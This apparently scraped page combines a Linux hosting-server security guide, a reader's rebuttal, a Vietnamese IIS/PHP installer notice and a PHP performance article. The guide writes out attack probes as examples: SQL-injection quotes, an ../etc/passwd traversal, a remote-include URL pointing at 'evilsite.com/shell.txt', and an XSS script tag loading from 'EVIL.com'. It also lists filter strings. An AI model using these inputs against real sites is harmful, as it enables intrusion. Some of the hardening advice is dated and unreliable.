In the even some one gets access to your server even with all the security you’ve gotten so far they might just be able to figure out one way or another to slip a backdoor in or in the case of ubiquity a botnet client,

So what exactly are some things you can do to prevent this if not stop it.

Well I honestly don’t think you can stop things like root kits, Trojans, viruses, botnet clients etc. from being on your System.

But you can stop or remove them once their on your system, or prevent them from being ran.

What all can a person do just by having the ability to upload a file.
Not much but once they find ways to execute what they have uploaded then you can pretty much consider them having root to your server.

At this point they can run multiple exploits that may be able to BoF(Buffer Over Flow) An process running under root on your system and from there they could get lucky and have the ability to execute code as that process.

Another thing they can do without having root is install an botnet client once this is done they have the ability to use your servers as their own resource to take other things down.

Trojans & Viruses on Linux aren’t too much of a worry as there aren’t too many out there but the ones that are made might just have enough access to delete most of the HDD on the Linux system.

Now a couple things I’ve researched on that can help prevent this.

—
Root Kit Hunter.
—
Description:

Root kit scanner is scanning tool to ensure you for about 99.9%* you’re clean of nasty tools. This tool scans for
Root kits, backdoors and local exploits by running tests like:

- MD5 hash compare
- Look for default files used by root kits

- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files

——-
Comments:
I highly recommend Root Kit Hunter.
—
Download
—
http://www.rootkit.nl/projects/rootkit_hunter.html
—
Clam Antivirus
—
Description:

* Command-line scanner
* Fast, multi-threaded daemon with support for on-access scanning
* milter interface for sendmail
* advanced database updater with support for scripted updates and digital signatures
* virus scanner C library
* on-access scanning (Linux and FreeBSD)
* virus database updated multiple times per day (see home page for total number of signatures)
* built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM,
BinHex, SIS and others
* built-in support for almost all mail file formats
* built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack,
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
* built-in support for popular document formats including MS Office and Mac Office files, HTML, RTF and PDF
——-
Comments:
Honestly I’d recommend this even when using Mod-Security I’ve built shells that will in fact bypass modsecurity well
this well scan the source codes of the PHP shell
and make sure thereï؟½s nothing that could potentially harm or allow the user to have to much access over the system.

—
Download
—
http://www.clamav.net/download/
–

Banning The Brute Forcers, FTP, SSH, etc.
—
APF (Advanced Policy Firewall)
—

Description:

Rather then grabbing this one off their site I figured I’d write one.

Well in my experience this is nothing like a normal firewall you would use on an windows system it checks for things like people trying to brute force Cpanel, SSH, FTP, etc. accounts.

Allows alot of configuration options some of which may also benfit in bandwidth saving and DDoS prevention,
Over all it blocks those ports your not using so even if some one manages to get an undetectable backdoor/botnet on your systems.
Then this will block it from connecting back to them and them connecting back to it.
—
Comments:
I will tell you no though this will be a pain to setup while hosting so many teamspeaks on account of all the ports you would have to constantly forward.
To make sure every one has the ability to get into their teamspeaks,

Some commands that can be used with this Firewall just incase you decide to use it.

Banning an IP
apf -d IP

Unbanning an IP
apf -u IP

I recommend ignoring your own IP in the

/etc/apf/allow_hosts.rules

Using the following syntax you can ignore your IP from all firewall rules meaning you don’t follow them.

d=PORT:d=IP // ENABLES YOUR IP COMMING IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT

For ranges you may do the following 192.168.1.1/255

It will then forward from 192.168.1.1 to 192.168.1.255 to be enabled

—
Download
—
http://www.r-fx.ca/downloads/apf-current.tar.gz


Part VIII. DDoS Protection and Saving Bandwith + Remote Loging.
—

Server Monitoring Remotely
—
Log Watch
—
Description:

An application that runs twenty-four seven on your server and sends the following things after going through them to your email.
-Apache_Access Logs

-Apache_Error Logs
-SSH_LOGIN’s Failed Or Succeeded
-FTP Logs
-Mail Logs
-Current HDD Sizes
-Kernel Logs
-Mail Logs
-Yum/APT-GET Logs

Comments:
This thing is very useful attempts to gain access to your server will be automatically emailed to you along with every thing that is not found gave some one and forbidden error and etc.
The only main requirement is that you have SendMail Running.

Mail Spam Protection
—

Spam Assassin
—

Description:

The core distribution consists of command line tools to perform filtering along with Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in a wide range of products.

Comments:
Never used it my self because I’ve never really had to bad of mail spam problems on my server but from what I’ve
read it is in fact pretty good at filtering out the spam in your emails.

—
Download
—
http://spamassassin.apache.org/downloads.cgi?update=200705021400

—
Some Extra Mail Protection

—
Be sure that your mail-server only allows your Server to use it or any other servers you may trust and deny all
others
many people will attempt to use open mail servers and spam resources.

—
DDoS Protection & Bandwidth Saving.

—
Ok first off some things people might do while DDoSing you.

Unless theDDoS attack is very strong I highly doubt it will take your whole server offline most DDoS attacks will mainly hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it’s a little more difficult to stop without having to get all of your clients IP addresses and adding them to the ignore lists in APF

But a basic thing you can do is have APF installed drop all ICMP packets. This will disable the ability to ping your server.
Next Install DDoS Deflate

—
DDoS Deflate
—
Comments/Description:
From my own experience an well written Perl Script that was made to run along with APF and monitor how many times an
IP is connected to your server before it bans it you may also run it manually typing the following in shell.

ddos Number Of Connections Allowed

When this is typed the Perl script will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned.

—
More Information can be found on this at

http://blog.medialayer.com/projects-ddos-deflate/

—-
Download
—-
http://www.inetbase.com/scripts/ddos/

Ok now for bandwidth saving and DDoS protection at the same time there is this really cool thing made for apache servers it’s called mod_evasive
It will limit the number of connections a person may open with apache and if they open to many it will ban them for what ever time you specify in the config.

—
mod_evasive

—

Detailed Description:
mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
* Requesting the same page more than a few times per second
* Making more than 50 concurrent requests on the same child per second
* Making any requests while temporarily blacklisted (on a blocking list)

This method has worked well in both single-server script attacks as well as distributed attacks, but just
like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it’s a good idea to integrate this with your firewalls and routers for maximum protection.

This module instantiates for each listener individually and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on ‘reload’ should not be affected
Unless they do it maliciously. mod_evasive is fully tweak able through the Apache configuration file, easy to
Incorporate into your web server, and easy to use.

— Comments:
This is a module I have in fact used with Apache before it honestly can get annoying if you configure it incorrectly

because you will be simply visiting the website and get banned.

—
Download/Install Tutorial

—
http://www.eth0.us/mod_evasive

–= That Will Cover Alot Of Security Issues =-

Hope you learned something, and benefited your server..

Have a good day!

The first step you always want to take to secure your hosting company is to make sure your own website.

Is completely secure some things to do if you are using a common CMS Google it with the word exploit make sure your version is not on there.

Next try any Get Vars in your scripts and put a ‘ at the end of them what I mean is you have = you add ‘ so it’s yourwebsite.com/page?=’ or any other similar thing not only page= you may also try char(39) rather then only ‘ most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ‘ but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
If you get an error you might want to check the script.

The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.

If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)…
If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use
The following to browse into other places ../../../../ if they wanted to they’d view your passwd file via ../../../../../../etc/passwd

Well right now you’d say big Woop they got some users maybe not but still have the ability to go to any forum on
that server and upload an avatar with PHP-EXIF data in it then include it
Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all…

Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.

Ok next were going to discuss the abilities of an RFI and how to block it…
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.

Prevention add http:// to your mod security this way when they try remotely including a file in the URL
http://www.evilsite.com mod_security will block it.

Ok our next subject is XSS this is a tricky one on account of there are many ways around mod security blocking this…

What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn’t really see it… but when you clicked they could potentially grab your cookie or any current stored browser information.
With this they could use your cookie as their own to login as you… maybe even get password information from this
cookie…

Now the other type of XSS is something you have to train your clients to look out for if some one ever asks for help and sends you a link that is accessing a remote website in the URL such as…
www.mysite.com/info.php?xss=<script>src=http://EVIL.com/xss.js</script>
Never click it what so ever… ban the person who has sent this.

Ok now for the mod_security bans… add <script> add <body= add </script> add “>
And this should fix your XSS problems that can actually cause damage…

As for SQL injection the way to block this is to… add ‘ or /* to the mod security be sure to add in char(39) as it’s ‘ in php and php will in fact read it from a URL and interpret it as ‘ and still launch the sql injection.

One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.

Zend should fix this problem.

Never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.

Part II. Your Employees

RULE-1 -PASSWORDS
Do not use password even more then once on your servers if you do the first time some one gets your password to any
Thing they have the ability to get into every thing on your server from there they get other peoples passwords and get more and more access over time they can take the whole hosting company…

RULE-2 -PHONE CHATS
Always request a person’s information verify every bit of it is correct also try to remember their voice because hackers will call you and try to get into people servers they can have correct information just by whoising the persons domain that their trying to get.

RULE-3 -Email CHATS
This one is a bit easier there is no emotion to what the person is trying to do…
If they slip up on one peace of information be sure to email them back and ask them to correct it before even
Sending any thing back or touching any thing.

RULE-4 -Talking to each other
While talking to each other in public services.. or services that my be able to be taped such as an IRC…
Be sure not to mention any root passwords, client names, etc…

Part III. Securing Your Server

Ok well first were going to do the obvious and CHMOD /home to 755

This is simple just go ahead and type chmod 755 /home
Or
CD /
chmod 755 home

Next were going to make sure no user has any bash access what so ever.

This may already be setup by the current hosting control panel you are using…
If not were going to nano /etc/passwd and make sure all Linux users that you don’t want having bash are set to
/sbin/nologin

I realize some hosting companies also do dedicated server companies so it wouldn’t work out if your client didn’t have
bash to the server.
So this is mainly based for the shared hosting servers.

Part IV. PHP Configuration.

Now were going to do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory [:…]
safe_mode_exec_dir = directory [:…]
expose_php = Off
register_globals = Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec,
phpinfo, popen, proc_open, base64_decode, base64_encodem, proc_terminate

Some explanations of the functions your disabling.

show_source(), Disables functions most shells use to view the source of other files one commonly
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral overflows have been found while using PHPINFO() that and you don’t
want people getting your version of PHP and etc. to attempt to exploit it if you may just be out of date or to up to
date.
system, Allows Bash Commands Via PHP

shell_exec, Allows Bash Commands via PHP

exec, Allows Bash Commands Via PHP

popen, Almost like Bash not quite but close using PHP

proc_open, Almost like bash not quite but close using PHP

base64_decode, decodes base64 encryptions… reason for disabling also allows users with server access to bypass mod security

base64_encode, encodes base64 encryptions… reason for disabling also allows users with server access to bypass mod security

proc_terminate, Terminates Processes running on the server.

Some reasons for having magic quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL injections.

But, you can skip disable some function like “base64″ , “phpinfo” …

Part V. MySQL and Apache Configurations

Disable all out bound MYSQL connections…

Besides from Trusted Servers

This may actually be set in the host’s field of the users in the actual MYSQL table, for each user account it lets you
Give them an IP or type any I’d recommend giving them an IP…
Although when you give them and IP don’t worry it’s not that you can only have one IP able to access that user you
do in fact have the ability to recreate the user
over and over and fill in the IP field differently each time.

Next you need to configure your apache to where it runs 1 process for each linux user and all scripts ran by that user run under their unix/linux permissions,GID & UID

A reference Document on how to do this can be found here.

http://httpd.apache.org/docs/1.3/suexec.html

Comments:
What this will do with apache is pretty much make sure that the users can’t access other users directories on the
Server this is a common vulnerability you get access to one site on the server and you get access to all websites on the same
server… this protects against it. All though apache is running under each user using SuEXEC would solve that problem.

Part VI. SSH Keys.

It’s not required but it is a recommendation to setup SSH keys this way people do not have the ability to brute force your SSH server.

A tutorial on how to do this can be found here:

http://www.sun.com/bigadmin/content/submitted/ssh_setting.html

If you do not wish to setup SSH Keys you may also use Linux host.allow, host.deny files to sort which ranges have the ability to access your server and which do not have the ability to access your server.

There are some references for this located here

http://linux.about.com/od/commands/l/blcmdl5_hostsal.htm

And here

http://www.userlocal.com/security/securinginetdetc.php

Part VII. BackDoor-Trojan-Rootkit Proctection & FireWall Setup

Down To The Back Door Protection

In the even some one gets access to your server even with all the security you’ve gotten so far they might just be able to figure out one way or another to slip a backdoor in or in the case of ubiquity a botnet client,

So what exactly are some things you can do to prevent this if not stop it.

Well I honestly don’t think you can stop things like root kits, Trojans, viruses, botnet clients etc. from being on your System.

But you can stop or remove them once their on your system, or prevent them from being ran.

What all can a person do just by having the ability to upload a file.
Not much but once they find ways to execute what they have uploaded then you can pretty much consider them having root to your server.

At this point they can run multiple exploits that may be able to BoF(Buffer Over Flow) An process running under root on your system and from there they could get lucky and have the ability to execute code as that process.

Another thing they can do without having root is install an botnet client once this is done they have the ability to use your servers as their own resource to take other things down.

Trojans & Viruses on Linux aren’t too much of a worry as there aren’t too many out there but the ones that are made might just have enough access to delete most of the HDD on the Linux system.

Now a couple things I’ve researched on that can help prevent this.

—
Root Kit Hunter.
—
Description:

Root kit scanner is scanning tool to ensure you for about 99.9%* you’re clean of nasty tools. This tool scans for
Root kits, backdoors and local exploits by running tests like:

- MD5 hash compare
- Look for default files used by root kits

- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files

——-
Comments:
I highly recommend Root Kit Hunter.
—
Download
—

http://www.rootkit.nl/projects/rootkit_hunter.html

—
Clam Antivirus
—
Description:

* Command-line scanner
* Fast, multi-threaded daemon with support for on-access scanning
* milter interface for sendmail
* advanced database updater with support for scripted updates and digital signatures
* virus scanner C library
* on-access scanning (Linux and FreeBSD)
* virus database updated multiple times per day (see home page for total number of signatures)
* built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM,
BinHex, SIS and others
* built-in support for almost all mail file formats
* built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack,
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
* built-in support for popular document formats including MS Office and Mac Office files, HTML, RTF and PDF
——-
Comments:
Honestly I’d recommend this even when using Mod-Security I’ve built shells that will in fact bypass modsecurity well
this well scan the source codes of the PHP shell
and make sure thereï؟½s nothing that could potentially harm or allow the user to have to much access over the system.

—
Download
—

http://www.clamav.net/download/

–

Banning The Brute Forcers, FTP, SSH, etc.
—
APF (Advanced Policy Firewall)
—

Description:

Rather then grabbing this one off their site I figured I’d write one.

Well in my experience this is nothing like a normal firewall you would use on an windows system it checks for things like people trying to brute force Cpanel, SSH, FTP, etc. accounts.

Allows alot of configuration options some of which may also benfit in bandwidth saving and DDoS prevention,
Over all it blocks those ports your not using so even if some one manages to get an undetectable backdoor/botnet on your systems.
Then this will block it from connecting back to them and them connecting back to it.
—
Comments:
I will tell you no though this will be a pain to setup while hosting so many teamspeaks on account of all the ports you would have to constantly forward.
To make sure every one has the ability to get into their teamspeaks,

Some commands that can be used with this Firewall just incase you decide to use it.

Banning an IP
apf -d IP

Unbanning an IP
apf -u IP

I recommend ignoring your own IP in the

/etc/apf/allow_hosts.rules

Using the following syntax you can ignore your IP from all firewall rules meaning you don’t follow them.

d=PORT:d=IP // ENABLES YOUR IP COMMING IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT

For ranges you may do the following 192.168.1.1/255

It will then forward from 192.168.1.1 to 192.168.1.255 to be enabled

—
Download
—

http://www.r-fx.ca/downloads/apf-current.tar.gz

Part VIII. DDoS Protection and Saving Bandwith + Remote Loging.

—

Server Monitoring Remotely
—
Log Watch
—
Description:

An application that runs twenty-four seven on your server and sends the following things after going through them to your email.
-Apache_Access Logs

-Apache_Error Logs
-SSH_LOGIN’s Failed Or Succeeded
-FTP Logs
-Mail Logs
-Current HDD Sizes
-Kernel Logs
-Mail Logs
-Yum/APT-GET Logs

Comments:
This thing is very useful attempts to gain access to your server will be automatically emailed to you along with every thing that is not found gave some one and forbidden error and etc.
The only main requirement is that you have SendMail Running.

Mail Spam Protection
—

Spam Assassin
—

Description:

The core distribution consists of command line tools to perform filtering along with Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in a wide range of products.

Comments:
Never used it my self because I’ve never really had to bad of mail spam problems on my server but from what I’ve
read it is in fact pretty good at filtering out the spam in your emails.

—
Download
—

http://spamassassin.apache.org/downloads.cgi?update=200705021400

—
Some Extra Mail Protection

—
Be sure that your mail-server only allows your Server to use it or any other servers you may trust and deny all
others
many people will attempt to use open mail servers and spam resources.

—
DDoS Protection & Bandwidth Saving.

—
Ok first off some things people might do while DDoSing you.

Unless theDDoS attack is very strong I highly doubt it will take your whole server offline most DDoS attacks will mainly hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it’s a little more difficult to stop without having to get all of your clients IP addresses and adding them to the ignore lists in APF

But a basic thing you can do is have APF installed drop all ICMP packets. This will disable the ability to ping your server.
Next Install DDoS Deflate

—
DDoS Deflate
—
Comments/Description:
From my own experience an well written Perl Script that was made to run along with APF and monitor how many times an
IP is connected to your server before it bans it you may also run it manually typing the following in shell.

ddos Number Of Connections Allowed

When this is typed the Perl script will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned.

—
More Information can be found on this at

http://blog.medialayer.com/projects-ddos-deflate/

—-
Download
—-

http://www.inetbase.com/scripts/ddos/

Ok now for bandwidth saving and DDoS protection at the same time there is this really cool thing made for apache servers it’s called mod_evasive
It will limit the number of connections a person may open with apache and if they open to many it will ban them for what ever time you specify in the config.

—
mod_evasive

—

Detailed Description:
mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
* Requesting the same page more than a few times per second
* Making more than 50 concurrent requests on the same child per second
* Making any requests while temporarily blacklisted (on a blocking list)

This method has worked well in both single-server script attacks as well as distributed attacks, but just
like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it’s a good idea to integrate this with your firewalls and routers for maximum protection.

This module instantiates for each listener individually and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on ‘reload’ should not be affected
Unless they do it maliciously. mod_evasive is fully tweak able through the Apache configuration file, easy to
Incorporate into your web server, and easy to use.

— Comments:
This is a module I have in fact used with Apache before it honestly can get annoying if you configure it incorrectly

because you will be simply visiting the website and get banned.

—
Download/Install Tutorial

—

http://www.eth0.us/mod_evasive

–= That Will Cover Alot Of Security Issues =-

Hope you learned something, and benefited your server..

Have a good day!

Maybe, you can skip disable some function, and mysql connection… because :

Disabling php functions, will involve individuals just leaving, end of story. There are PLENTY of other ways to do things securely, but disabling php functions is just asking for problems.

Case in point:
(most) image galleries won’t work with the said configuration, because they rely on imagemagick, or something else, or rely on system() calls. What, you’re going to tell your customers “I’m sorry, but you can’t have a gallery”?

base64(de/en)code, again, quite common. There is no reason to terminate or not allow this to be used.

Quote:

Use something that DOESN’T require 5 million configuration files for Brute force/etc , CSF handles things properly, and the developer doesn’t dissapear for months on end. Rather than configure things differently per application (sshd, mail, http, etc), and rely on cron jobs, you’re better off using ONE configuration file for ONE application that handles things properly. APF is pretty much dead, the author abandoned it for almost 2 years until he found he had some competition.

Quote:

NOTHING will block an SQL injection aside from proper code. If the evildoer wants to get something injected, they will do it. Using your method will cause problems with applications that are legitimately trying to do things a certain way.

Security isn’t about disabling things for clients, it’s about making sure that clients can use things while the server itself is reasonably safe. Nothing will EVER be 100% of the way safe, ever, as long as it is plugged in.

Cho tới thời điểm này IIS-AID PHP Installer đã hỗ trợ đến các mức sau:

- Làm việc tốt với IIS từ phiên bản 5.x, 6 và 7
- Phiên bản được đóng gói PHP 5.2.5
- Hỗ trợ Microsoft FastCGI mapping, được biết tới như 1 giải pháp cache cho các dòng sản phẩm của hãng thứ 3 trên nền tảng IIS.
- 2 phiên bản cho: 32 bit và 64 bit
… bạn có thể xem thêm tại trang thông tin sản phẩm http://www.iis-aid.com/iis_aid_php_installer
Hoặc download luôn bộ cài đặt tại đây:

- Phiên bản chạy trên nền 32bit: http://www.iis-aid.com/system/files/IIS-Aid+PHP+Installer+%28×86%29.exe

- Phiên bản chạy trên nền 64 bit: http://www.iis-aid.com/system/files/IIS-Aid+PHP+Installer+%28×64%29.exe

PHP is a very fast programming language, but there is more to optimizing PHP than just speed of code execution.

Let us take a more realistic example to clarify matters further. Suppose we need to write a PHP script that reads a 250K file and generates a HTML summary of the file. We write 2 scripts that do the same thing: hare.php that reads the whole file into memory at once and processes it in one pass, and tortoise.php that reads the file, one line at time, never keeping more than the longest line in memory. Tortoise.php will be slower as multiple reads are issued, requiring more system calls.

As the above example shows, obtaining good performance is not merely writing fast PHP scripts. High performance PHP requires a good understanding of the underlying hardware, the operating system and supporting software such as the web server and database.

Bottlenecks

The hare and tortoise example has shown us that bottlenecks cause slowdowns. With infinite RAM, hare.php will always be faster than tortoise.php. Unfortunately, the above model is a bit simplistic and there are many other bottlenecks to performance apart from RAM:

(a) Networking

Your network is probably the biggest bottleneck. Let us say you have a 10 Mbit link to the Internet, over which you can pump 1 megabyte of data per second. If each web page is 30k, a mere 33 web pages per second will saturate the line.

More subtle networking bottlenecks include frequent access to slow network services such as DNS, or allocating insufficient memory for networking software.

(b) CPU

If you monitor your CPU load, sending plain HTML pages over a network will not tax your CPU at all because as we mentioned earlier, the bottleneck will be the network. However for the complex dynamic web pages that PHP generates, your CPU speed will normally become the limiting factor. Having a server with multiple processors or having a server farm can alleviate this.

(c) Shared Memory

Shared memory is used for inter-process communication, and to store resources that are shared between multiple processes such as cached data and code. If insufficient shared memory is allocated any attempt to access resources that use shared memory such as database connections or executable code will perform poorly.

(d) File System

Accessing a hard disk can be 50 to 100 times slower than reading data from RAM. File caches using RAM can alleviate this. However low memory conditions will reduce the amount of memory available for the file-system cache, slowing things down. File systems can also become heavily fragmented, slowing down disk accesses. Heavy use of symbolic links on Unix systems can slow down disk accesses too.

Default Linux installs are also notorious for setting hard disk default settings which are tuned for compatibility and not for speed. Use the command hdparm to tune your Linux hard disk settings.

(e) Process Management

On some operating systems such as Windows creating new processes is a slow operation. This means CGI applications that fork a new process on every invocation will run substantially slower on these operating systems. Running PHP in multi-threaded mode should improve response times (note: older versions of PHP are not stable in multi-threaded mode).

Avoid overcrowding your web server with too many unneeded processes. For example, if your server is purely for web serving, avoid running (or even installing) X-Windows on the machine. On Windows, avoid running Microsoft Find Fast (part of Office) and 3-dimensional screen savers that result in 100% CPU utilization.

Some of the programs that you can consider removing include unused networking protocols, mail servers, antivirus scanners, hardware drivers for mice, infrared ports and the like. On Unix, I assume you are accessing your server using SSH. Then you can consider removing:

deamons such as telnetd, inetd, atd, ftpd, lpd, sambad
sendmail for incoming mail
portmap for NFS
xfs, fvwm, xinit, X

You can also disable at startup various programs by modifying the startup files which are usually stored in the /etc/init* or /etc/rc*/init* directory.

Tuning Your Web Server for PHP

For large sites, values close to the following might be better:

MinSpareServers 32

Apache on Windows behaves differently. Instead of using child processes, Apache uses threads. The above parameters are not used. Instead we have one parameter: ThreadsPerChild which defaults to 50. This parameter sets the number of threads that can be spawned by Apache. As there is only one child process in the Windows version, the default setting of 50 means only 50 concurrent HTTP requests can be handled. For web servers experiencing higher traffic, increase this value to between 256 to 1024.

Other useful performance parameters you can change include:

If you do not require DNS lookups and you are not using the htaccess file to configure Apache settings for individual directories you can set:

# disable DNS lookups: PHP scripts only get the IP address

If you are not worried about the directory security when accessing symbolic links, turn on FollowSymLinks and turn off SymLinksIfOwnerMatch to prevent additional lstat() system calls from being made:

Options FollowSymLinks

(b) IIS Tuning

You can also configure the default isolation level of your web site. In the Home Directory tab under Application Protection, you can define your level of isolation. A highly isolated web site will run slower because it is running as a separate process from IIS, while running web site in the IIS process is the fastest but will bring down the server if there are serious bugs in the web site code. Currently I recommend running PHP web sites using CGI, or using ISAPI with Application Protection set to high.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Inetinfo\Parameters\

If the settings are missing from this registry location, the defaults are being used.

The PHP script was loaded by the Zend Engine and compiled into Zend opcode. Opcodes, short for operation codes, are low level binary instructions. Then the opcode was executed and the HTML generated sent to the client. The opcode was flushed from memory after execution.

PHP Scripts are loaded into memory and compiled into Zend opcodes. These opcodes can now be optimized using an optional peephole optimizer called Zend Optimizer. Depending on the script, it can increase the speed of your PHP code by 0-50%.

One of the secrets of high performance is not to write faster PHP code, but to avoid executing PHP code by caching generated HTML in a file or in shared memory. The PHP script is only run once and the HTML is captured, and future invocations of the script will load the cached HTML. If the data needs to be updated regularly, an expiry value is set for the cached HTML. HTML caching is not part of the PHP language nor Zend Engine, but implemented using PHP code. There are many class libraries that do this. One of them is the PEAR Cache, which we will cover in the next section. Another is the Smarty template library.

<?php

If your HTML is highly compressible, it is possible to reduce the size of your HTML file by 50-80%, reducing network bandwidth requirements and latencies. The downside is that you need to have some CPU power to spare for compression.

require_once(“Cache/Output.php”);

$cache = new Cache_Output(“file”, array(“cache_dir” => “cache/”) );

if ($contents = $cache->start(md5(“this is a unique key!”))) {

#
# aha, cached data returned
#

  print $contents;
  print “<p>Cache Hit</p>”;

} else {

#
# no cached data, or cache expired
#

  print “<p>Don’t leave home without it…</p>”; # place in cache
  print “<p>Stand and deliver</p>”; # place in cache
  print $cache->end(10);

}

Since I wrote these lines, a superior PEAR cache system has been developed: Cache Lite; and for more sophisticated distributed caching, see memcached (Added 28 Feb 2005). The Cache constructor takes the storage driver to use as the first parameter. File, database and shared memory storage drivers are available; see the pear/Cache/Container directory. Benchmarks by Ulf Wendel suggest that the “file” storage driver offers the best performance. The second parameter is the storage driver options. The options are “cache_dir”, the location of the caching directory, and “filename_prefix”, which is the prefix to use for all cached files. Strangely enough, cache expiry times are not set in the options parameter.

<?php

To save the data we use save(). If your unique key is already a legal file name, you can bypass the generateID() step. Objects and arrays can be saved because save() will serialize the data for you. The last parameter controls when the data expires; this can be the seconds to cache the data, or a Unix integer timestamp giving the date and time to expire the data, or zero to use the default of 24 hours. To retrieve the cached data we use get().

You can delete a cached data item using $cache->delete($id) and remove all cached items using $cache->flush().

New: A faster Caching class is Cache-Lite. Highly recommended.

Using Benchmarks

In earlier section we have covered many performance issues. Now we come to the meat and bones, how to go about measuring and benchmarking your code so you can obtain decent information on what to tune.

If you want to perform realistic benchmarks on a web server, you will need a tool to send HTTP requests to the server. On Unix, common tools to perform benchmarks include ab (short for apachebench) which is part of the Apache release, and the newer flood (httpd.apache.org/test/flood). On Windows NT/2000 you can use Microsoft’s free Web Application Stress Tool (webtool.rte.microsoft.com).

These programs can make multiple concurrent HTTP requests, simulating multiple web clients, and present you with detailed statistics on completion of the tests.

You can monitor how your server behaves as the benchmarks are conducted on Unix using “vmstat 1″. This prints out a status report every second on the performance of your disk i/o, virtual memory and CPU load. Alternatively, you can use “top d 1″ which gives you a full screen update on all processes running sorted by CPU load every 1 second.

On Windows 2000, you can use the Performance Monitor or the Task Manager to view your system statistics.

If you want to test a particular aspect of your code without having to worry about the HTTP overhead, you can benchmark using the microtime(), which returns the current time accurate to the microsecond as a string. The following function will convert it into a number suitable for calculations.

function getmicrotime()
{
 list($usec, $sec) = explode(” “,microtime());
return ((float)$usec + (float)$sec);
}

Alternatively, you can use a profiling tool such as APD or XDebug. Also see my article squeezing code with xdebug.

Benchmarking Case Study

This case study details a real benchmark we did for a client. In this instance, the customer wanted a guaranteed response time of 5 seconds for all PHP pages that did not involve running long SQL queries. The following server configuration was used: an Apache 1.3.20 server running PHP 4.0.6 on Red Hat 7.2 Linux. The hardware was a twin Pentium III 933 MHz beast with 1 Gb of RAM. The HTTP requests will be for the PHP script “testmysql.php”. This script reads and processes about 20 records from a MySQL database running on another server. For the sake of simplicity, we assume that all graphics are downloaded from another web server.

# ab   -n1000 -c10 http://192.168.0.99/php/testmysql.php
This is ApacheBench, Version 1.3
Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright (c) 1998-1999 The Apache Group, http://www.apache.org/

Server Software:        Apache/1.3.20
Server Hostname:        192.168.0.99
Server Port:            80

Document Path:          /php/testmysql.php
Document Length:        25970 bytes

Concurrency Level:      10
Time taken for tests:   128.672 seconds
Complete requests:      1000
Failed requests:        0
Total transferred:      26382000 bytes
HTML transferred:       25970000 bytes
Requests per second:    7.77
Transfer rate:          205.03 kb/s received

Connnection Times (ms)
              min   avg   max
Connect:        0     9   114
Processing:   698  1274  2071
Total:        698  1283  2185

